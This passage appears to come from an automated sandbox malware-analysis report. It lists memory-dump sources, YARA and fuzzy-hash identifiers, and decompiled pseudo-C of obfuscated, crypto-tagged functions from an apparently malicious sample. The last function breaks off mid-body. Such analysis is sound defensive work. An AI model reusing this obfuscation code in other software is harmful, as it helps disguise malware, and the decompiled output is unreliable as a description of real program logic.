                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0044b4c0
                                                                                                    0x0044b4cc
                                                                                                    0x0044b4d3
                                                                                                    0x0044b4d4
                                                                                                    0x0044b4da
                                                                                                    0x0044b4e0
                                                                                                    0x0044b4ec
                                                                                                    0x0044b4ec
                                                                                                    0x0044b4fe
                                                                                                    0x0044b504
                                                                                                    0x0044b504
                                                                                                    0x0044b50a
                                                                                                    0x0044b510
                                                                                                    0x0044b517
                                                                                                    0x0044b517
                                                                                                    0x0044b51f
                                                                                                    0x0044b532
                                                                                                    0x0044b539
                                                                                                    0x0044b548
                                                                                                    0x0044b54e
                                                                                                    0x0044b560
                                                                                                    0x0044b566
                                                                                                    0x0044b56c
                                                                                                    0x0044b56c
                                                                                                    0x0044b572
                                                                                                    0x0044b572
                                                                                                    0x0044b581
                                                                                                    0x0044b595
                                                                                                    0x0044b5a1
                                                                                                    0x0044b5a7
                                                                                                    0x0044b5a8
                                                                                                    0x0044b5af
                                                                                                    0x0044b5b6
                                                                                                    0x0044b5b7
                                                                                                    0x0044b5b8
                                                                                                    0x0044b5be
                                                                                                    0x0044b5c4
                                                                                                    0x0044b5c6
                                                                                                    0x0044b5cc
                                                                                                    0x0044b5cd
                                                                                                    0x0044b5d3
                                                                                                    0x0044b5df
                                                                                                    0x0044b5e5
                                                                                                    0x0044b5eb
                                                                                                    0x0044b5f1
                                                                                                    0x0044b5f7
                                                                                                    0x0044b5fe
                                                                                                    0x0044b604
                                                                                                    0x0044b60a
                                                                                                    0x0044b616
                                                                                                    0x0044b616
                                                                                                    0x0044b621
                                                                                                    0x0044b627
                                                                                                    0x0044b628
                                                                                                    0x0044b62f
                                                                                                    0x0044b635
                                                                                                    0x0044b643
                                                                                                    0x0044b64e
                                                                                                    0x0044b655
                                                                                                    0x0044b65c
                                                                                                    0x0044b662
                                                                                                    0x0044b668
                                                                                                    0x0044b668
                                                                                                    0x0044b67a
                                                                                                    0x0044b680
                                                                                                    0x0044b685
                                                                                                    0x0044b68b
                                                                                                    0x0044b697
                                                                                                    0x0044b6a5
                                                                                                    0x0044b6ac
                                                                                                    0x0044b6b2
                                                                                                    0x0044b6b4
                                                                                                    0x0044b6b6
                                                                                                    0x0044b6bc
                                                                                                    0x0044b6cd
                                                                                                    0x0044b6d4
                                                                                                    0x0044b6e5
                                                                                                    0x0044bfe1
                                                                                                    0x0044bfe1
                                                                                                    0x0044bfe7
                                                                                                    0x0044bfee
                                                                                                    0x0044bfef
                                                                                                    0x0044bffc
                                                                                                    0x0044c002
                                                                                                    0x0044c008
                                                                                                    0x0044c012
                                                                                                    0x0044c013
                                                                                                    0x0044c014
                                                                                                    0x0044c019
                                                                                                    0x0044c01f
                                                                                                    0x0044c01f
                                                                                                    0x0044bfdb

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 95f5e308ed0b6f256aaa1e09e6b9c24660200332c788d8e167b3fe4c0cf4bf6b
                                                                                                    • Instruction ID: 5b87573bd89a5821418741f705668e9747ab2f844d8b49f6a34a200f0a61c04d
                                                                                                    • Opcode Fuzzy Hash: 95f5e308ed0b6f256aaa1e09e6b9c24660200332c788d8e167b3fe4c0cf4bf6b
                                                                                                    • Instruction Fuzzy Hash: 0EB1A732908791CFD716CF39C94AB423FB1F792324B08874ED8A1A7896C735295ADF85
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B4DBD2, Relevance: .2, Instructions: 212COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5f914ab04c0b7b45b84d4bf6eb0ea9260158c95430cdb1d3892a7627fa9e19a6
                                                                                                    • Instruction ID: abcb3a440586f3539e58f1d95f6d737fa99ec516684716157fb3d1e69281b7e7
                                                                                                    • Opcode Fuzzy Hash: 5f914ab04c0b7b45b84d4bf6eb0ea9260158c95430cdb1d3892a7627fa9e19a6
                                                                                                    • Instruction Fuzzy Hash: D471E675E001299FCF14DF69C880ABEB7F1EF88310B1541A9E855EB385DA34DE41EBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B528EC, Relevance: .2, Instructions: 211COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 912f78c2a80534b04ba8d125ebd8e8e6b61f25d30e784c22d7927f681c4c7118
                                                                                                    • Instruction ID: f6cf98bb722d452471031ba84647a0b0bd5816577f1c520ea418a6ec93b1461a
                                                                                                    • Opcode Fuzzy Hash: 912f78c2a80534b04ba8d125ebd8e8e6b61f25d30e784c22d7927f681c4c7118
                                                                                                    • Instruction Fuzzy Hash: B671C231A0110A9BCB19CF69C8817AEB7E1EF4A311F1481F9EC15D7380EB34D949CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0044BBFB, Relevance: .2, Instructions: 208COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 44%
                                                                                                    			E0044BBFB(signed char __eax, signed int __ebx, signed char __ecx, void* __edi) {
				signed char _t30;
				signed char _t32;
				signed char _t35;
				signed char _t36;
				signed int _t42;
				signed int _t55;
				signed int _t59;
				signed int _t60;
				signed int _t62;
				signed int _t65;

				_t35 = __ecx;
				_t32 = __ebx;
				_t30 = __eax;
				_t55 =  *0x990c333;
				asm("rcl byte [0xf65422ca], 0x83");
				 *0xdea542df = _t62 |  *0x606061a9;
				 *0xcf4da01e =  *0xcf4da01e - __ebx;
				 *0x165c22ed =  *0x165c22ed ^ _t59;
				asm("ror dword [0x13d41596], 0x6c");
				_t60 = _t59 - 0x79533966;
				_t65 =  *0xdea542df & 0xc104e88c;
				asm("sbb cl, [0x2e346238]");
				_t42 = 0xcf |  *0x20485f98;
				 *0x454b56be =  *0x454b56be | __ebx;
				if( *0x454b56be == 0) {
					_pop( *0x959a2b7b);
					if(__eflags >= 0) {
						__eflags = __esp & 0xe7582770;
						if((__esp & 0xe7582770) == 0) {
							asm("sbb [0x97e8087b], edi");
							__ebx = 0xdb255a05;
							asm("lodsd");
							_push( *0x58ead7b9);
							__ah = __ah & 0x000000b1;
							asm("sbb eax, 0x78116516");
							__bl = __bl ^  *0xed4c3710;
							L1();
							_push( *0xa8e617e8);
							__esp = __esp + 1;
							asm("sbb ah, [0x46304520]");
							__eflags =  *0xaeba0ad2 & __bl;
							asm("adc edx, [0x6395fa0e]");
							__eflags = __bh - 0x86;
							__edx = __edx ^ 0x39c9e6d6;
							__eflags = __edx;
							_pop( *0xab11b9a3);
							if(__edx == 0) {
								__eflags = __esp -  *0x9244f875;
								asm("lodsd");
								__edi = __edi + 1;
								__eflags =  *0x78351f19 & 0x8518a7d5;
								 *0x32192025 =  *0x32192025 >> 0xae;
								asm("sbb ebx, [0x6918e1dc]");
								__eflags = __edx -  *0x34e9632f;
								 *0x4235c6c6 =  *0x4235c6c6 >> 0x59;
								__esp = __esp + 1;
								_pop( *0xc5579fbc);
								asm("rcl byte [0x3e8c5e4], 0xe2");
								_push(0x8518a7d5);
								_push( *0xe297a96);
								 *0x2ddcd580 =  *0x2ddcd580 - __bh;
								__edi = __edi +  *0xf8ad97f3;
								asm("sbb edi, 0x125cb18f");
								_pop(__ebp);
								asm("rcl dword [0x6f887b6c], 0x93");
								_push( *0xde4a612f);
								 *0x8c86a632 =  *0x8c86a632 | __ch;
								__eflags =  *0x8c86a632;
								if( *0x8c86a632 > 0) {
									_t28 = __ecx;
									__ecx =  *0x6e33e876;
									 *0x6e33e876 = _t28;
									_t29 = __esp;
									__esp =  *0x9441b1db;
									 *0x9441b1db = _t29;
									__eax = __eax - 1;
									 *0x3085964 =  *0x3085964 << 0xb;
									__ch = 0xf9;
									 *0xea3d6121 =  *0xea3d6121 >> 0xe6;
									__eflags =  *0xea3d6121;
									asm("ror dword [0x8d1a0f0d], 0x55");
									if( *0xea3d6121 < 0) {
										__eflags = 0x8518a7d5 - 0x85a76479;
										__eax = __eax -  *0xc4b1b425;
										asm("lodsb");
										__ebx = 0xdb255a05 ^  *0xa4834aa1;
										_push( *0xcf174a33);
										__cl = __cl - 0xc6;
										asm("adc esp, [0xfab00cdb]");
										asm("adc ebx, [0xe5148a2b]");
										__edi = __edi -  *0x3bb6c8f;
										 *0x6c20b62d =  *0x6c20b62d - __ebp;
										 *0xa0e24794 =  *0xa0e24794 - __ebp;
										__ebx = 0xdb255a05 ^  *0xa4834aa1 |  *0xb152951b;
										asm("lodsb");
										__ebp = __ebp;
										 *0x25be126c =  *0x25be126c >> 0xa1;
										__eflags =  *0x25be126c;
										if(__eflags == 0) {
											asm("sbb edx, 0x1355fe7a");
											if(__eflags > 0) {
												__edi =  *0x87d47376;
												asm("rcl dword [0xab282b0e], 0xfd");
												 *0x8353239e = __edx;
												asm("adc ebx, [0xe9091b11]");
												__eflags = __ecx -  *0x30a7f51d;
												 *0xc84ae2cf = __eax;
											}
										}
									}
								}
							}
						}
					}
				}
				while(1) {
					L1:
					_t60 = _t60 -  *0xd6d4e09;
					_push( *0x92af3c21);
					asm("adc edi, [0xdd0dd9fc]");
					if(_t60 >= 0) {
						continue;
					}
					L2:
					_t36 = _t35 - 1;
					asm("rol dword [0xa9553596], 0xc3");
					_t55 = _t55 + 1;
					 *0xe0879028 =  *0xe0879028 | _t36;
					_t35 = _t36 +  *0x8dbda16;
					_t42 = 0xc3b1061 -  *0x29e2c8dc;
					_push( *0x6f95ed05);
					if(0xc3b1061 >= 0xff834b9) {
						while(1) {
							L1:
							_t60 = _t60 -  *0xd6d4e09;
							_push( *0x92af3c21);
							asm("adc edi, [0xdd0dd9fc]");
							if(_t60 >= 0) {
								continue;
							}
							goto L2;
							do {
								do {
									do {
										do {
											goto L1;
										} while (_t60 >= 0);
										goto L2;
									} while (0xc3b1061 >= 0xff834b9);
									goto L3;
								} while ( *0x54133b1e >= 0);
								_t60 = _t60 -  *0xf052e179;
								 *0x898fdca2 =  *0x898fdca2 << 0x59;
								asm("sbb esi, 0x7a830803");
								asm("sbb dl, [0xedb00aca]");
								asm("sbb ah, [0x86651c38]");
								 *0xb4e1bdb = _t42;
								_t65 = _t65 ^  *0x1d05d9df;
								_t42 =  *0x4863efee;
								 *0x4863efee =  *0xb4e1bdb;
								_t32 = (_t32 | 0x0000003a) &  *0xce97fdce | 0x0000000a;
							} while (_t32 > 0);
							 *0x34facd17 =  *0x34facd17 << 0xd0;
							asm("adc ecx, 0xce473839");
							asm("adc [0xdd4b29e2], dl");
							asm("lodsd");
							asm("rol byte [0x3abc98a2], 0x27");
							_t55 = 0xa9f28bd8 +  *0x12e391ce;
							_push(_t65);
							_push(_t60);
							 *0x1bf947f0 =  *0x1bf947f0 - _t65;
							_t65 = _t65 ^ 0x0286d09b;
							_t30 = _t30 & 0x000000d2;
							asm("sbb eax, [0x8260a58e]");
							_t32 = _t32 - 1;
							asm("sbb edx, [0x93b52b83]");
							asm("adc ebp, [0x9b38133d]");
							_t35 = _t35 +  *0x359c84b4;
							_t42 = _t42 &  *0xdb5b4dc0;
							asm("adc ecx, 0xc547de92");
							_push( *0xdf038bf3);
							asm("rcl byte [0xad722e2], 0x17");
							 *0x6c5d652a =  *0x6c5d652a + _t32;
							asm("sbb ah, [0xf5d2cf2c]");
							 *0x3a08c695 = 0x4b0f1676;
							_push(0x8bc16a1e);
							if(( *0x98d0263f & 0xa9f28bd8) != 0) {
								continue;
							} else {
								asm("adc esi, 0xdc14647b");
								_t32 = _t32 - 1;
								 *0x31a4ba03 =  *0x31a4ba03 << 0xbc;
								 *0x53bc9564 =  *0x53bc9564 & 0xa9f28bd8;
								 *0x7ce8e6f4 =  *0x7ce8e6f4 << 0x8e;
								_t55 = _t55 - 0x2ddb22c2;
								 *0x2b41d9f9 =  *0x2b41d9f9 >> 0x15;
								 *0x11774c30 =  *0x11774c30 << 0x33;
								_t60 = _t60 ^ 0x7c6b55cb;
								_t65 = _t65 +  *0xe8313764;
								_t35 = 0x480d832e ^  *0x757162e3;
								if(_t35 != 0) {
									continue;
								} else {
									 *0x7d8e83e0 = _t42;
									asm("sbb eax, 0xf3eddf65");
									asm("sbb [0x61f8b91a], dh");
									asm("adc edx, 0x3d743c39");
									asm("cmpsw");
									asm("ror byte [0xa776fff2], 0xf9");
									 *0x6b95c4ef =  *0x6b95c4ef | _t60 &  *0x867701de;
									_push(_t35);
									asm("cmpsb");
									 *0x1be2c49f =  *0x7d8e83e0;
									asm("adc eax, 0x701e721");
									 *0x52bb42d9 =  *0x52bb42d9 << 0x6d;
									_push( *0x25fb150d);
									return  *0x44532e6a * 0xecb7;
								}
							}
						}
					}
					L3:
					_t55 = _t55 & 0x3491e20e;
					_t35 =  *0xf0ece6bd;
					 *0xf0ece6bd =  *0x310d487d * 0xc9ee;
					 *0x54133b1e =  *0x54133b1e ^ _t60;
					asm("rol dword [0x49f2711d], 0x37");
					asm("sbb edi, [0xf6fb63f0]");
					L1:
					_t60 = _t60 -  *0xd6d4e09;
					_push( *0x92af3c21);
					asm("adc edi, [0xdd0dd9fc]");
				}
			}













                                                                                                    0x0044bbfb
                                                                                                    0x0044bbfb
                                                                                                    0x0044bbfb
                                                                                                    0x0044bbfb
                                                                                                    0x0044bc07
                                                                                                    0x0044bc0e
                                                                                                    0x0044bc16
                                                                                                    0x0044bc22
                                                                                                    0x0044bc28
                                                                                                    0x0044bc30
                                                                                                    0x0044bc36
                                                                                                    0x0044bc3c
                                                                                                    0x0044bc42
                                                                                                    0x0044bc48
                                                                                                    0x0044bc4e
                                                                                                    0x0044bc54
                                                                                                    0x0044bc5a
                                                                                                    0x0044bc60
                                                                                                    0x0044bc66
                                                                                                    0x0044bc6c
                                                                                                    0x0044bc72
                                                                                                    0x0044bc78
                                                                                                    0x0044bc79
                                                                                                    0x0044bc7f
                                                                                                    0x0044bc82
                                                                                                    0x0044bc87
                                                                                                    0x0044bc8d
                                                                                                    0x0044bc92
                                                                                                    0x0044bc98
                                                                                                    0x0044bc99
                                                                                                    0x0044bc9f
                                                                                                    0x0044bca5
                                                                                                    0x0044bcab
                                                                                                    0x0044bcae
                                                                                                    0x0044bcae
                                                                                                    0x0044bcba
                                                                                                    0x0044bcc0
                                                                                                    0x0044bcc6
                                                                                                    0x0044bccc
                                                                                                    0x0044bccd
                                                                                                    0x0044bcd4
                                                                                                    0x0044bcda
                                                                                                    0x0044bce1
                                                                                                    0x0044bce7
                                                                                                    0x0044bced
                                                                                                    0x0044bcf4
                                                                                                    0x0044bcf5
                                                                                                    0x0044bcfb
                                                                                                    0x0044bd02
                                                                                                    0x0044bd03
                                                                                                    0x0044bd09
                                                                                                    0x0044bd0f
                                                                                                    0x0044bd15
                                                                                                    0x0044bd21
                                                                                                    0x0044bd22
                                                                                                    0x0044bd29
                                                                                                    0x0044bd2f
                                                                                                    0x0044bd2f
                                                                                                    0x0044bd35
                                                                                                    0x0044bd3b
                                                                                                    0x0044bd3b
                                                                                                    0x0044bd3b
                                                                                                    0x0044bd41
                                                                                                    0x0044bd41
                                                                                                    0x0044bd41
                                                                                                    0x0044bd47
                                                                                                    0x0044bd48
                                                                                                    0x0044bd4f
                                                                                                    0x0044bd51
                                                                                                    0x0044bd51
                                                                                                    0x0044bd58
                                                                                                    0x0044bd5f
                                                                                                    0x0044bd65
                                                                                                    0x0044bd6b
                                                                                                    0x0044bd71
                                                                                                    0x0044bd72
                                                                                                    0x0044bd78
                                                                                                    0x0044bd7f
                                                                                                    0x0044bd82
                                                                                                    0x0044bd88
                                                                                                    0x0044bd8e
                                                                                                    0x0044bd94
                                                                                                    0x0044bd9a
                                                                                                    0x0044bda0
                                                                                                    0x0044bda6
                                                                                                    0x0044bda7
                                                                                                    0x0044bda8
                                                                                                    0x0044bda8
                                                                                                    0x0044bdaf
                                                                                                    0x0044bdb5
                                                                                                    0x0044bdbb
                                                                                                    0x0044bdc1
                                                                                                    0x0044bdc7
                                                                                                    0x0044bdce
                                                                                                    0x0044bdd4
                                                                                                    0x0044bdda
                                                                                                    0x0044bde0
                                                                                                    0x0044bde0
                                                                                                    0x0044bdbb
                                                                                                    0x0044bdaf
                                                                                                    0x0044bd5f
                                                                                                    0x0044bd35
                                                                                                    0x0044bcc0
                                                                                                    0x0044bc66
                                                                                                    0x0044bc5a
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4ac
                                                                                                    0x0044b4b2
                                                                                                    0x0044b4b8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0044b4ba
                                                                                                    0x0044b4c0
                                                                                                    0x0044b4cc
                                                                                                    0x0044b4d3
                                                                                                    0x0044b4d4
                                                                                                    0x0044b4da
                                                                                                    0x0044b4e0
                                                                                                    0x0044b4ec
                                                                                                    0x0044b4f2
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4ac
                                                                                                    0x0044b4b2
                                                                                                    0x0044b4b8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0044b4a6
                                                                                                    0x00000000
                                                                                                    0x0044b4a6
                                                                                                    0x0044b51f
                                                                                                    0x0044b532
                                                                                                    0x0044b539
                                                                                                    0x0044b548
                                                                                                    0x0044b54e
                                                                                                    0x0044b560
                                                                                                    0x0044b566
                                                                                                    0x0044b56c
                                                                                                    0x0044b56c
                                                                                                    0x0044b572
                                                                                                    0x0044b572
                                                                                                    0x0044b581
                                                                                                    0x0044b595
                                                                                                    0x0044b5a1
                                                                                                    0x0044b5a7
                                                                                                    0x0044b5a8
                                                                                                    0x0044b5af
                                                                                                    0x0044b5b6
                                                                                                    0x0044b5b7
                                                                                                    0x0044b5b8
                                                                                                    0x0044b5be
                                                                                                    0x0044b5c4
                                                                                                    0x0044b5c6
                                                                                                    0x0044b5cc
                                                                                                    0x0044b5cd
                                                                                                    0x0044b5d3
                                                                                                    0x0044b5df
                                                                                                    0x0044b5e5
                                                                                                    0x0044b5eb
                                                                                                    0x0044b5f1
                                                                                                    0x0044b5f7
                                                                                                    0x0044b5fe
                                                                                                    0x0044b604
                                                                                                    0x0044b60a
                                                                                                    0x0044b616
                                                                                                    0x0044b61b
                                                                                                    0x00000000
                                                                                                    0x0044b621
                                                                                                    0x0044b621
                                                                                                    0x0044b627
                                                                                                    0x0044b628
                                                                                                    0x0044b62f
                                                                                                    0x0044b635
                                                                                                    0x0044b643
                                                                                                    0x0044b64e
                                                                                                    0x0044b655
                                                                                                    0x0044b65c
                                                                                                    0x0044b662
                                                                                                    0x0044b668
                                                                                                    0x0044b66e
                                                                                                    0x00000000
                                                                                                    0x0044b674
                                                                                                    0x0044b67a
                                                                                                    0x0044b680
                                                                                                    0x0044b685
                                                                                                    0x0044b68b
                                                                                                    0x0044b697
                                                                                                    0x0044b6a5
                                                                                                    0x0044b6ac
                                                                                                    0x0044b6b2
                                                                                                    0x0044b6b4
                                                                                                    0x0044b6b6
                                                                                                    0x0044b6bc
                                                                                                    0x0044b6cd
                                                                                                    0x0044b6d4
                                                                                                    0x0044b6e5
                                                                                                    0x0044b6e5
                                                                                                    0x0044b66e
                                                                                                    0x0044b61b
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4f4
                                                                                                    0x0044b4fe
                                                                                                    0x0044b504
                                                                                                    0x0044b504
                                                                                                    0x0044b50a
                                                                                                    0x0044b510
                                                                                                    0x0044b517
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4a6
                                                                                                    0x0044b4ac
                                                                                                    0x0044b4b2
                                                                                                    0x0044b4b2

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429843332.0000000000430000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429892463.000000000044D000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429905966.000000000044E000.00000020.00000001.sdmp Download File
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 53226f40ceb82d64a0e6d9a4c8982765d1d10c2f60ef2ef1d857a406861c1009
                                                                                                    • Instruction ID: 9e0de4079b1e48181c49ee23de066c7a81bfad97c9112ddc8cbff82ac4a72384
                                                                                                    • Opcode Fuzzy Hash: 53226f40ceb82d64a0e6d9a4c8982765d1d10c2f60ef2ef1d857a406861c1009
                                                                                                    • Instruction Fuzzy Hash: EAA17632908780CFEB16CF38D88AF413FB1F356720B04424ED4A267986C334651ADF89
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B1B8D0, Relevance: .2, Instructions: 199COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 68f4882f0742b7aaaace644535563b1569d2128fed8a3e82ffad24b1d9357c21
                                                                                                    • Instruction ID: c5a2ab464fb736267d45c258043bc7ff64122ca05286f8bc40333388dd3937b7
                                                                                                    • Opcode Fuzzy Hash: 68f4882f0742b7aaaace644535563b1569d2128fed8a3e82ffad24b1d9357c21
                                                                                                    • Instruction Fuzzy Hash: 4C710D32200701EFDB228F24C985FAAB7E5EF44720F6545ACE6558B6A1DB71E981CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B06DC9, Relevance: .2, Instructions: 199COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                    • Instruction ID: 89f90da9e8e7c1743def9c6605e351d775d6c5b6ef402b8ce58396a5e60b399f
                                                                                                    • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                    • Instruction Fuzzy Hash: 39714B71E00219AFCB10DFA9C985AEEBBF9FF48710F104169E505E7291DB34AA51CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B41002, Relevance: .2, Instructions: 198COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 42f51a7a5a5ce2f362edff3d1686e7341e7034e2a337669f1049e763a8f83ead
                                                                                                    • Instruction ID: f7437d37d658bb227adc7053594c165e4f4ee126355e18302a5485307b2e5b00
                                                                                                    • Opcode Fuzzy Hash: 42f51a7a5a5ce2f362edff3d1686e7341e7034e2a337669f1049e763a8f83ead
                                                                                                    • Instruction Fuzzy Hash: 23716934E00662CBDB24CF5AC48067AB3F1FB44301B644CAED9969B740E7B5AED0EB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0044C4CB, Relevance: .2, Instructions: 167COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 52%
                                                                                                    			E0044C4CB(signed int __eax, signed char __ebx, signed int __ecx, signed char __edx, signed int __esi) {
				void* _v3;
				intOrPtr _t24;
				signed int _t31;
				signed char _t32;
				signed char _t34;
				signed char _t39;
				signed int _t40;
				signed char _t41;
				signed int _t42;
				signed char _t43;
				signed int _t46;
				signed char _t50;
				signed int _t60;
				signed int _t64;

				_t60 = __esi;
				_t50 = __edx;
				_t42 = __ecx;
				_t34 = __ebx;
				_t19 = __eax;
				goto L1;
				do {
					do {
						do {
							do {
								do {
									L1:
									 *0x939ff7b7 =  *0x939ff7b7 << 0x6e;
									 *0x8f83e7b0 = _t19;
								} while ( *0x939ff7b7 == 0);
								asm("rcl dword [0xdc624d74], 0xca");
								_t19 = _t19 |  *0xc419e217;
							} while (_t19 != 0);
							_t19 = 0xdd634e75;
							asm("adc ah, 0x18");
							_t34 = (_t34 ^  *0x73aeb002) -  *0xace77cd1;
							_t60 = _t60 |  *0x2f9d1616;
							 *0xc1ddbd1c =  *0xc1ddbd1c + _t42;
							asm("sbb [0xa8e0cc32], bl");
							asm("adc edx, 0xc02c16ef");
							 *0xefca2585 =  *0xefca2585 + 0xdd634e75;
							asm("sbb [0xe0cc32b2], ch");
							asm("sbb [0xa616efa8], ah");
							asm("adc ah, 0xc6");
							_t64 =  &_v3 | 0xc1daa919;
							 *0xa8e0cc32 =  *0xa8e0cc32 - _t34;
							_push(0xc83916ef);
						} while ( *0xa8e0cc32 != 0);
						asm("adc [0x45d8a8c4], edi");
						 *0xc68ff209 =  *0xc68ff209 >> 0x2b;
						 *0xe0cc32c1 =  *0xe0cc32c1 | 0xdd634e75;
						 *0x3816efa8 =  *0x3816efa8 - _t34;
						asm("adc eax, [0x173a7bc8]");
						_push(_t50);
						_push(0xdd634e75);
						asm("adc ecx, [0xef45d88d]");
						 *0x81d04116 = _t50;
						asm("adc ecx, [0xef45d88d]");
						 *0x50405217 =  *0x50405217 + _t64;
						 *0xef45d88d =  *0xef45d88d + (0xffffffffddfcc543 ^  *0x81c42916);
						asm("adc [0x9cba1d16], ebp");
						_t24 = 0xdd634e75;
						asm("rcr dword [0xef45d88d], 0xa8");
						 *0xe7553110 =  *0xe7553110 << 0x73;
						 *0x1db40ffd = _t24;
						_push( *0xe0cc3283);
						_t43 = _t42 ^ 0x000000a8;
						asm("adc eax, 0x6d2b16ef");
						 *0xefbe0b1c =  *0xefbe0b1c << 0x5d;
						_t60 = _t60 - 0xe0cc32c1;
						 *0x8a16efa8 =  *0x8a16efa8 + _t43;
						asm("sbb [0xbe17ff2f], ebx");
						asm("ror dword [0xcc32bfdd], 0xb");
						asm("adc bh, [0x32c5f7c6]");
						asm("adc esi, 0xefa8e0cc");
						asm("sbb al, 0xb0");
						 *0x67b3c621 =  *0x67b3c621 ^ _t60;
						 *0xc0d601ee =  *0xc0d601ee << 0xd5;
						asm("sbb eax, [0x16d24939]");
						asm("stosb");
						 *0x5f828ee2 =  *0x5f828ee2 | _t43;
						_t39 = (_t34 + 0x0000003a ^  *0x32ee16ef) +  *0x16efa8e0 &  *0x16d24939;
						 *0x140b36b6 =  *0x140b36b6 + _t43;
						asm("adc esp, [0x32ccebb8]");
						 *0x8ce2a816 =  *0x8ce2a816 + _t39;
						 *0xaece9d8d =  *0xaece9d8d & _t60;
						_t40 = _t39 |  *0xa8e0cc32;
						 *0x9e8e16ef =  *0x9e8e16ef | _t60;
						asm("adc ebp, [0xd79c0126]");
						 *0xe0cc32c1 =  *0xe0cc32c1 - 0x8b7a16ef;
						asm("sbb [0xaf869af2], ch");
						asm("sbb dh, [0x420816d2]");
						_push( *0xe0cc32ba);
						 *0x416efa8 =  *0x416efa8 << 0xf5;
